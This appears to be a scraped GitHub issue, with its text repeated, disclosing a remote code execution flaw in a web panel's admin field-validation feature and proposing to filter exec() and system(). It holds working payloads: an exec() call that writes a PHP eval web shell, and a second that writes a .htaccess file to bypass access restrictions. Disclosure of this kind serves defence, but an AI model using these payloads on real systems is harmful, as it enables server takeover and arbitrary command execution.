Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Affected version
login address
http://loacalhost/panel
Find Fields after login
Fields
On the right are the operations related to the column, choose one here, select Facebook
Facebook
open Required field
Required field
Validation PHP code can enter any php code, here is a sentence of Trojan
Validation PHP code
exec('echo ^<?php eval($_GET["aa"]); ?^> >./templates/shell.php');
Then visit
http://loacalhost/profile/?edit
This code written will be triggered when the corresponding column is modified
But due to the .htaccess file under the root path, we cannot directly access the shell
.htaccess
we can write a .htaccess file in the same directory of the shell to bypass
In the same way, execute
exec('echo ^<IfModule mod_rewrite.c^> >./templates/.htaccess');exec('echo RewriteEngine Off ^</IfModule^> >>./templates/.htaccess');
Then go to /profile/?edit to trigger it
/profile/?edit
At this time, you can access the shell and execute any command
The reason is that the code at the background Fields will be written to the database
Then when the information is modified, the data in it will be executed through eval()
eval()
The incoming Validation PHP code adds filtering for sensitive functions, such as exec(), system(), etc.
exec()
system()
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Remote code execution vulnerabilities in the background
Affected version
login address
Find

Fieldsafter loginOn the right are the operations related to the column, choose one here, select

Facebookopen

Required fieldValidation PHP codecan enter any php code, here is a sentence of TrojanThen visit
This code written will be triggered when the corresponding column is modified

But due to the


.htaccessfile under the root path, we cannot directly access the shellwe can write a
.htaccessfile in the same directory of the shell to bypassIn the same way, execute
Then go to

/profile/?editto trigger itAt this time, you can access the shell and execute any command

principle
The reason is that the code at the background

Fieldswill be written to the databaseThen when the information is modified, the data in it will be executed through

eval()Proposed changes
The incoming
Validation PHP codeadds filtering for sensitive functions, such asexec(),system(), etc.The text was updated successfully, but these errors were encountered: